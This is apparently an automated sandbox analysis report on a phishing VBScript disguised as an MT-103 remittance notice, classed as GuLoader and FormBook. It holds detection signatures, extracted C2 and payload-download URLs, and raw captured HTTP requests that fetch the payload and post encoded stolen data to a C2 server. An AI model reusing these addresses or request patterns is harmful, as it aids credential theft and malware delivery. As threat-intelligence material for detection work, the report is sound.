Windows Analysis Report
Remittance Information (MT-103).vbs

Overview

General Information

Sample Name:	Remittance Information (MT-103).vbs
Analysis ID:	558870
MD5:	d693624e3d9614a0dc9cf5a5cd1bb8ef
SHA1:	9c50c26e8b2f9c9acfa3192385df88d3144f351c
SHA256:	dcc73a1351b6b79d48f7b42a96edfb142ffe46f896e1ab9f412a615b1edd7c9b
Tags:	vbs
Infos:

Detection

FormBook GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected FormBook malware

VBScript performs obfuscated calls to suspicious functions

System process connects to network (likely due to code injection or exploit)

Sigma detected: Suspect Svchost Activity

Yara detected GuLoader

Found malware configuration

Yara detected FormBook

Malicious sample detected (through community Yara rule)

Tries to steal Mail credentials (via file / registry access)

Maps a DLL or memory area into another process

Tries to detect Any.run

Wscript starts Powershell (via cmd or directly)

Potential malicious VBS script found (suspicious strings)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Encrypted powershell cmdline option found

Sigma detected: Suspicious Svchost Process

Tries to detect virtualization through RDTSC time measurements

Tries to harvest and steal browser information (history, passwords, etc)

Hides threads from debuggers

Sample uses process hollowing technique

Potential evasive VBS script found (sleep loop)

Writes to foreign memory regions

Potential malicious VBS script found (has network functionality)

Very long command line found

Sigma detected: Suspicious Remote Thread Created

Modifies the prolog of user mode functions (user mode inline hooks)

Queues an APC in another process (thread injection)

Sigma detected: Accessing WinAPI in PowerShell. Code Injection.

Modifies the context of a thread in another process (thread injection)

C2 URLs / IPs found in malware configuration

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

JA3 SSL client fingerprint seen in connection with other malware

HTTP GET or POST without a user agent

Contains long sleeps (>= 3 min)

Abnormal high CPU Usage

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Java / VBScript file with very long strings (likely obfuscated code)

Drops PE files

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Checks if the current process is being debugged

Compiles C# or VB.Net code

Found large amount of non-executed APIs

Creates a process in suspended mode (likely to inject code)

Queries the volume information (name, serial number etc) of a device

Yara signature match

Internet Provider seen in connection with other malware

Found potential string decryption / allocating functions

Contains functionality to call native functions

Found dropped PE file which has not been started or loaded

Contains functionality for execution timing, often used to detect debuggers

Enables debug privileges

Sigma detected: Suspicious Csc.exe Source File Folder

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Sigma detected: Suspicious Execution of Powershell with Base64

Sigma detected: Autorun Keys Modification

Found WSH timer for Javascript or VBS script (likely evasive script)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Signatures

AV Detection

Found malware configuration

Source: 0000001A.00000002.874088041.0000000002A10000.00000040.80000000.00040000.00000000.sdmp	Malware Configuration Extractor: FormBook {"C2 list": ["www.usyeslogistics.com/k6sm/"], "decoy": ["mingshengjewelry.com", "ontimecleaningenterprise.com", "alyssa0.xyz", "ptecex.xyz", "dukfot.online", "pvcpc.com", "iowalawtechnology.com", "nestletranspotation.com", "mysithomes.com", "greenlakespaseattle.com", "evofishingsystems.com", "unilytcs.com", "ordemt.com", "dentalbatonrouge.com", "pictureme360.net", "chalinaslacatalana.com", "newmirrorimage.xyz", "pinklaceandlemonade.com", "rapinantes.com", "yzicpa.com", "josephosman.com", "robsarra.com", "shumgroup.net", "flooringnewhampshire.com", "onceadayman.com", "audiomacklaunch.xyz", "hurryburry.com", "golfvid.info", "tutortenbobemail.com", "tatlitelasorganizasyon.com", "tqgtdd.space", "classicalruns.com", "xx3tgnf.xyz", "galwayartanddesign.com", "qidu.press", "crypto-obmennik.com", "dn360rn001.com", "tridim.tech", "phamhome.com", "mediadollskill.com", "loveatmetaverse.com", "electric4x4parts.com", "azulymargarita.com", "isadoramel.com", "rubyclean.com", "officiallydanellewright.com", "wu8d349s67op.xyz", "detetivepyther.com", "wondubniumgy463.xyz", "registry-finance3.com", "ultracoding.com", "open-4business.com", "supremelt.online", "pangfeng.xyz", "morneview.com", "northfloridapsychic.com", "kg4bppuh.xyz", "friv.asia", "epsilonhomecare.com", "hbina.com", "beachhutprinting.com", "sophoscloudoptix.net", "managemarksol.site", "palestyna24.info"]}
Source: 00000017.00000000.621139519.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp	Malware Configuration Extractor: GuLoader {"Payload URL": "https://www.bulkwhatsappsender.in/bin_FlDFmmV154.bin1"}

Yara detected FormBook

Source: Yara match	File source: 0000001A.00000002.874088041.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.873877212.0000000002710000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000000.698865578.000000000DD15000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.873684957.0000000000550000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.729280321.0000000002C20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.729334535.0000000002C50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000000.716819564.000000000DD15000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Source: unknown

HTTPS traffic detected: 151.106.117.33:443 -> 192.168.2.6:49820 version: TLS 1.2

Source:	Binary string: ieinstal.pdbGCTL source: svchost.exe, 0000001A.00000002.875332208.000000000392F000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 0000001A.00000002.874340657.0000000002E12000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: ieinstal.pdb source: svchost.exe, 0000001A.00000002.875332208.000000000392F000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 0000001A.00000002.874340657.0000000002E12000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: ieinstal.exe, 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, ieinstal.exe, 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 0000001A.00000003.731672310.0000000003200000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000003.729304161.0000000003000000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.874979162.000000000351F000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.874833482.0000000003400000.00000040.00000800.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: ieinstal.exe, ieinstal.exe, 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, ieinstal.exe, 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, svchost.exe, 0000001A.00000003.731672310.0000000003200000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000003.729304161.0000000003000000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.874979162.000000000351F000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.874833482.0000000003400000.00000040.00000800.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: ieinstal.exe, 00000017.00000003.728221731.0000000002F07000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000017.00000002.741936624.000000001EAA0000.00000040.10000000.00040000.00000000.sdmp, ieinstal.exe, 00000017.00000003.728303049.0000000002EC3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: ieinstal.exe, 00000017.00000003.728221731.0000000002F07000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000017.00000002.741936624.000000001EAA0000.00000040.10000000.00040000.00000000.sdmp, ieinstal.exe, 00000017.00000003.728303049.0000000002EC3000.00000004.00000020.00020000.00000000.sdmp

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Domain query: www.dentalbatonrouge.com
Source: C:\Windows\explorer.exe	Domain query: www.yzicpa.com
Source: C:\Windows\explorer.exe	Network Connect: 108.175.14.116 80	Jump to behavior

Potential malicious VBS script found (has network functionality)

Source:

Initial file: BinaryStream.SaveToFile NONN, 2

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: www.usyeslogistics.com/k6sm/
Source: Malware configuration extractor	URLs: https://www.bulkwhatsappsender.in/bin_FlDFmmV154.bin1

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

HTTP GET or POST without a user agent

Source: global traffic

HTTP traffic detected: GET /k6sm/?d48pAVX=VId1XGgV51+banGxzL0dUPYEUmU95ttpJOMZNiN8gg3/S9FPXBDAGWpY0ehao+dqxo0M4PI93Q==&8pnDfl=Lb3tdB30pX2 HTTP/1.1Host: www.dentalbatonrouge.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /bin_FlDFmmV154.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.bulkwhatsappsender.inCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /k6sm/ HTTP/1.1Host: www.dentalbatonrouge.comConnection: closeContent-Length: 417Cache-Control: no-cacheOrigin: http://www.dentalbatonrouge.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://www.dentalbatonrouge.com/k6sm/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 64 34 38 70 41 56 58 3d 64 71 52 50 4a 68 70 75 38 57 57 61 4c 41 58 66 67 76 45 42 4c 5a 74 69 62 45 49 77 30 4d 42 38 58 62 42 42 51 69 46 6c 68 53 54 6b 57 4d 68 48 64 55 79 71 4a 68 6f 45 71 75 46 6d 70 4f 4e 55 33 6f 45 50 31 2d 4d 61 75 43 4b 6e 57 6f 49 69 66 72 70 31 6c 59 47 4a 39 30 28 5f 61 62 70 6a 35 65 61 4b 44 43 30 59 30 43 28 37 6a 32 35 4f 4a 7a 49 49 68 76 65 61 57 38 4c 48 77 47 31 6f 58 57 51 76 62 35 61 51 49 4f 76 37 4c 6c 79 37 34 61 68 30 32 71 43 32 70 4b 72 67 4c 61 55 70 78 44 73 37 72 43 31 69 39 42 34 76 58 4e 49 43 58 63 64 70 49 64 4c 4b 4d 6f 62 52 64 32 31 6b 6d 6c 30 67 78 43 6f 31 4e 5a 45 76 44 54 36 46 6d 62 35 64 70 61 42 58 77 62 30 66 42 78 78 4b 6a 39 4d 30 43 71 44 6a 6f 56 68 47 4c 7a 4b 48 68 44 34 37 64 65 42 51 76 2d 4c 4c 45 37 49 57 73 54 6a 46 6b 6c 69 2d 52 47 43 38 56 45 70 57 54 46 67 46 72 76 4f 69 65 43 50 75 4e 62 77 61 34 66 61 71 57 4e 4e 6f 36 4d 74 6f 77 57 4f 73 66 30 52 4d 6c 43 6c 34 52 67 6f 76 41 2d 6d 6f 34 44 72 42 48 6f 7e 4d 4b 4a 61 37 41 44 50 68 68 32 4f 50 6a 72 31 50 70 44 67 38 55 70 4e 57 6a 4b 73 6f 35 41 38 51 62 70 48 49 28 46 6f 4c 37 37 7e 47 70 48 30 56 49 67 73 64 4f 5f 59 77 31 51 54 4c 65 5f 54 71 43 39 76 6a 63 7a 48 75 35 76 56 4b 65 52 45 2e 00 00 00 00 00 00 00 00 Data Ascii: d48pAVX=dqRPJhpu8WWaLAXfgvEBLZtibEIw0MB8XbBBQiFlhSTkWMhHdUyqJhoEquFmpONU3oEP1-MauCKnWoIifrp1lYGJ90(_abpj5eaKDC0Y0C(7j25OJzIIhveaW8LHwG1oXWQvb5aQIOv7Lly74ah02qC2pKrgLaUpxDs7rC1i9B4vXNICXcdpIdLKMobRd21kml0gxCo1NZEvDT6Fmb5dpaBXwb0fBxxKj9M0CqDjoVhGLzKHhD47deBQv-LLE7IWsTjFkli-RGC8VEpWTFgFrvOieCPuNbwa4faqWNNo6MtowWOsf0RMlCl4RgovA-mo4DrBHo~MKJa7ADPhh2OPjr1PpDg8UpNWjKso5A8QbpHI(FoL77~GpH0VIgsdO_Yw1QTLe_TqC9vjczHu5vVKeRE.
Source: global traffic	HTTP traffic detected: POST /k6sm/ HTTP/1.1Host: www.dentalbatonrouge.comConnection: closeContent-Length: 180913Cache-Control: no-cacheOrigin: http://www.dentalbatonrouge.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://www.dentalbatonrouge.com/k6sm/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 64 34 38 70 41 56 58 3d 64 71 52 50 4a 67 51 66 77 47 53 4c 4d 32 48 65 79 62 68 4e 41 36 30 39 66 48 4d 6a 77 63 35 6f 61 72 74 52 51 69 30 69 73 77 37 36 64 4d 78 48 62 52 47 74 44 68 6f 4c 73 75 46 68 7e 2d 42 46 36 66 41 48 31 38 67 38 75 44 79 6b 50 62 51 6a 66 62 70 63 6c 34 61 6c 70 45 36 36 61 5a 74 4b 34 39 32 53 57 79 77 59 74 32 54 39 28 44 64 56 4f 78 73 54 76 37 7e 6c 55 35 65 5a 7a 78 45 58 52 7a 34 5a 4e 74 43 57 44 63 7a 73 48 45 43 48 75 74 31 4e 34 65 71 39 71 4c 76 7a 47 59 77 74 77 77 31 59 32 7a 30 51 33 52 67 78 42 61 6b 4b 64 4e 4a 41 62 64 36 35 4d 6f 6a 42 55 6c 51 69 69 6d 51 65 7a 54 55 50 59 34 77 68 64 77 44 41 69 59 42 67 36 4a 49 50 76 75 49 50 46 67 4d 49 69 5f 6b 6b 59 2d 4f 56 71 42 78 38 66 79 36 37 6a 55 59 7a 41 4f 78 76 68 64 72 63 4b 49 41 65 70 52 50 5a 71 6c 69 64 54 47 44 39 66 6e 68 75 59 30 6b 61 7e 66 28 44 65 46 54 2d 58 62 63 42 35 5a 53 45 4c 35 46 6c 32 63 78 6b 37 7a 6a 4d 4a 7a 68 48 69 68 34 54 62 41 70 67 64 73 7e 5f 34 44 71 2d 48 70 7e 71 4d 34 7e 37 44 79 76 55 78 42 79 54 68 72 31 53 76 51 49 2d 4e 72 59 62 6a 4f 34 6f 6a 53 6c 33 62 65 62 49 36 57 67 45 36 61 7e 47 6f 58 30 56 4f 67 74 38 48 4e 64 45 31 51 79 34 58 61 53 4c 54 50 6a 67 58 6b 79 64 74 50 70 65 63 55 38 65 41 73 6c 79 58 75 4c 37 7e 76 53 52 73 37 52 71 30 4c 4c 4d 41 49 65 52 7e 68 75 58 58 59 6d 77 59 48 47 69 49 73 5a 68 69 73 44 57 62 35 63 6a 4e 6b 62 4c 46 63 5a 61 73 58 6d 58 7e 6a 76 54 43 76 6d 44 35 76 65 6f 42 35 76 74 44 6a 33 37 79 54 77 31 78 75 58 2d 4e 38 6e 6d 6d 59 69 69 53 64 42 62 67 77 7a 6f 59 4a 55 50 67 45 42 4d 68 58 4c 50 77 43 67 52 36 64 64 49 4f 2d 79 56 77 38 53 2d 50 78 56 6b 44 55 48 75 31 41 34 43 67 69 35 6b 79 76 52 79 4e 50 45 4c 39 2d 78 46 7e 6a 75 4d 71 6b 6d 43 6a 75 30 43 32 56 42 46 74 47 47 56 54 5a 47 46 6c 72 54 30 70 6a 6f 56 56 73 38 58 6f 52 78 76 41 72 36 72 73 77 48 6d 75 38 6d 67 63 32 32 73 34 6b 62 41 77 55 41 75 35 69 44 4d 74 6c 55 6f 28 45 4e 48 56 42 68 77 31 44 6b 4e 47 4f 74 44 54 7a 47 71 6c 6e 63 75 39 61 4f 73 4f 58 47 4a 37 31 48 4f 63 2d 77 31 66 7a 28 72 47 59 6f 50 4e 70 34 52 38 44 48 48 6d 38 41 6e 36 34 51 64 6d 49 62 4c 75 54 76 47 59 35 63 42 54 54 4f 73 31 6b 58 37 54 30 7a 64 62 38 69 44 59 51 6f 45 7a 54 4f 31 44 6f 35 52 46 59 77 57 33 6c 48 6d 74 51 76 50 39 38 38 5f 75 69 55 43 75 69 48 4d 64 6e 47 6c 4b 77 74 51 73 46 6f 4e 39 4e 74 78 4c 34 34 6e 7a 57 28 4c 58 43 4a 72 77 77 4f 55 51 59 4e 43 78 61 4d 56 52 55 49 4a 56 6c 63 6f 48 39 70 51 57 4e 75 33 51 4e 4e 46 68 4f 30 49 66 66 46 74 55 69 59 5a 39 76 33 38 4b 79 76 76 68 33

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: ONEANDONE-ASBrauerstrasse48DE ONEANDONE-ASBrauerstrasse48DE
Source: Joe Sandbox View	ASN Name: PLUSSERVER-ASN1DE PLUSSERVER-ASN1DE

Source: powershell.exe, 00000004.00000002.673929777.00000000081A0000.00000004.00000800.00020000.00000000.sdmp, ieinstal.exe, 00000017.00000003.661419330.0000000002ECE000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000017.00000003.659480092.0000000002ECE000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000017.00000003.661232085.0000000002ECE000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000017.00000002.729620511.0000000002ECE000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000017.00000003.728303049.0000000002EC3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000004.00000002.671138016.00000000064A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000004.00000002.666875748.0000000005587000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000004.00000002.666505278.0000000005441000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: svchost.exe, 0000001A.00000002.874553594.0000000002EAE000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5e
Source: svchost.exe, 0000001A.00000002.874571626.0000000002EBE000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: powershell.exe, 00000004.00000002.666875748.0000000005587000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: explorer.exe, 00000018.00000000.704735877.000000000095C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000018.00000000.687907955.000000000095C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000018.00000000.666953603.000000000095C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000018.00000000.756892182.000000000095C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: svchost.exe, 0000001A.00000002.874495731.0000000002E9D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.msn.com/de-ch/?ocid=iehpMicrosoftEdge_DNTExceptionLMEM8P
Source: svchost.exe, 0000001A.00000002.874495731.0000000002E9D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.msn.com/de-ch/?ocid=iehphttp://www.msn.com/de-ch/?ocid=iehp
Source: svchost.exe, 0000001A.00000002.874495731.0000000002E9D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.msn.com/de-ch/ocid=iehpD
Source: svchost.exe, 0000001A.00000002.874571626.0000000002EBE000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.msn.com/ocid=iehp
Source: svchost.exe, 0000001A.00000002.874595505.0000000002ED2000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.874020367.00000000027D8000.00000004.00000010.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.874571626.0000000002EBE000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=9774759596232;g
Source: svchost.exe, 0000001A.00000003.748120365.0000000005D00000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.874571626.0000000002EBE000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=30055406629
Source: svchost.exe, 0000001A.00000002.874571626.0000000002EBE000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=7859736
Source: svchost.exe, 0000001A.00000002.874464586.0000000002E90000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3005540662929;gt
Source: svchost.exe, 0000001A.00000002.874595505.0000000002ED2000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.874571626.0000000002EBE000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3005540662929;gtm=
Source: svchost.exe, 0000001A.00000002.874571626.0000000002EBE000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://contextual.media.net/checksync.php&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C
Source: svchost.exe, 0000001A.00000002.874595505.0000000002ED2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
Source: svchost.exe, 0000001A.00000002.874316141.0000000002E0E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://contextual.media.net/medianet.phpcid=8CU157172&crid=722878611&size=306x271&https=1
Source: svchost.exe, 0000001A.00000002.874571626.0000000002EBE000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://contextual.media.net/medianet.phpcid=8CU157172&crid=858412214&size=306x271&https=1
Source: powershell.exe, 00000004.00000002.671138016.00000000064A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000004.00000002.671138016.00000000064A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000004.00000002.671138016.00000000064A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000004.00000002.666875748.0000000005587000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: ieinstal.exe, 00000017.00000002.729749422.0000000003110000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://madecosmetics.store/bin_FlDFmmV154.bin
Source: powershell.exe, 00000004.00000002.671138016.00000000064A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: ieinstal.exe, 00000017.00000002.729749422.0000000003110000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.bulkwhatsappsender.in/bin_FlDFmmV154.bin
Source: ieinstal.exe, 00000017.00000002.729749422.0000000003110000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.bulkwhatsappsender.in/bin_FlDFmmV154.binhttps://madecosmetics.store/bin_FlDFmmV154.bin
Source: svchost.exe, 0000001A.00000002.875610610.0000000003E1F000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.dentalbatonrouge.com/k6sm/?d48pAVX=VId1XGgV51
Source: svchost.exe, 0000001A.00000002.874571626.0000000002EBE000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/
Source: svchost.exe, 0000001A.00000003.748120365.0000000005D00000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/https://www.google.com/chrome/thank-you.htmlabout:blankhttps://adservi
Source: svchost.exe, 0000001A.00000002.874464586.0000000002E90000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/thank-you.htmlstatcb=0&installdataindex=empty&defaultbrowser=0o

Source: unknown

DNS traffic detected: queries for: www.bulkwhatsappsender.in

Source: global traffic	HTTP traffic detected: GET /bin_FlDFmmV154.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.bulkwhatsappsender.inCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /k6sm/?d48pAVX=VId1XGgV51+banGxzL0dUPYEUmU95ttpJOMZNiN8gg3/S9FPXBDAGWpY0ehao+dqxo0M4PI93Q==&8pnDfl=Lb3tdB30pX2 HTTP/1.1Host: www.dentalbatonrouge.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49820
Source: unknown	Network traffic detected: HTTP traffic on port 49820 -> 443

Source: unknown

HTTP traffic detected: POST /k6sm/ HTTP/1.1Host: www.dentalbatonrouge.comConnection: closeContent-Length: 417Cache-Control: no-cacheOrigin: http://www.dentalbatonrouge.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.dentalbatonrouge.com/k6sm/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 64 34 38 70 41 56 58 3d 64 71 52 50 4a 68 70 75 38 57 57 61 4c 41 58 66 67 76 45 42 4c 5a 74 69 62 45 49 77 30 4d 42 38 58 62 42 42 51 69 46 6c 68 53 54 6b 57 4d 68 48 64 55 79 71 4a 68 6f 45 71 75 46 6d 70 4f 4e 55 33 6f 45 50 31 2d 4d 61 75 43 4b 6e 57 6f 49 69 66 72 70 31 6c 59 47 4a 39 30 28 5f 61 62 70 6a 35 65 61 4b 44 43 30 59 30 43 28 37 6a 32 35 4f 4a 7a 49 49 68 76 65 61 57 38 4c 48 77 47 31 6f 58 57 51 76 62 35 61 51 49 4f 76 37 4c 6c 79 37 34 61 68 30 32 71 43 32 70 4b 72 67 4c 61 55 70 78 44 73 37 72 43 31 69 39 42 34 76 58 4e 49 43 58 63 64 70 49 64 4c 4b 4d 6f 62 52 64 32 31 6b 6d 6c 30 67 78 43 6f 31 4e 5a 45 76 44 54 36 46 6d 62 35 64 70 61 42 58 77 62 30 66 42 78 78 4b 6a 39 4d 30 43 71 44 6a 6f 56 68 47 4c 7a 4b 48 68 44 34 37 64 65 42 51 76 2d 4c 4c 45 37 49 57 73 54 6a 46 6b 6c 69 2d 52 47 43 38 56 45 70 57 54 46 67 46 72 76 4f 69 65 43 50 75 4e 62 77 61 34 66 61 71 57 4e 4e 6f 36 4d 74 6f 77 57 4f 73 66 30 52 4d 6c 43 6c 34 52 67 6f 76 41 2d 6d 6f 34 44 72 42 48 6f 7e 4d 4b 4a 61 37 41 44 50 68 68 32 4f 50 6a 72 31 50 70 44 67 38 55 70 4e 57 6a 4b 73 6f 35 41 38 51 62 70 48 49 28 46 6f 4c 37 37 7e 47 70 48 30 56 49 67 73 64 4f 5f 59 77 31 51 54 4c 65 5f 54 71 43 39 76 6a 63 7a 48 75 35 76 56 4b 65 52 45 2e 00 00 00 00 00 00 00 00 Data Ascii: d48pAVX=dqRPJhpu8WWaLAXfgvEBLZtibEIw0MB8XbBBQiFlhSTkWMhHdUyqJhoEquFmpONU3oEP1-MauCKnWoIifrp1lYGJ90(_abpj5eaKDC0Y0C(7j25OJzIIhveaW8LHwG1oXWQvb5aQIOv7Lly74ah02qC2pKrgLaUpxDs7rC1i9B4vXNICXcdpIdLKMobRd21kml0gxCo1NZEvDT6Fmb5dpaBXwb0fBxxKj9M0CqDjoVhGLzKHhD47deBQv-LLE7IWsTjFkli-RGC8VEpWTFgFrvOieCPuNbwa4faqWNNo6MtowWOsf0RMlCl4RgovA-mo4DrBHo~MKJa7ADPhh2OPjr1PpDg8UpNWjKso5A8QbpHI(FoL77~GpH0VIgsdO_Yw1QTLe_TqC9vjczHu5vVKeRE.

Source: unknown

HTTPS traffic detected: 151.106.117.33:443 -> 192.168.2.6:49820 version: TLS 1.2

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 0000001A.00000002.874088041.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.873877212.0000000002710000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000000.698865578.000000000DD15000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.873684957.0000000000550000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.729280321.0000000002C20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.729334535.0000000002C50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000000.716819564.000000000DD15000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

System Summary

Detected FormBook malware

Source: C:\Windows\SysWOW64\svchost.exe	Dropped file: C:\Users\user\AppData\Roaming\K-NBS4VB\K-Nlogri.ini			Jump to dropped file
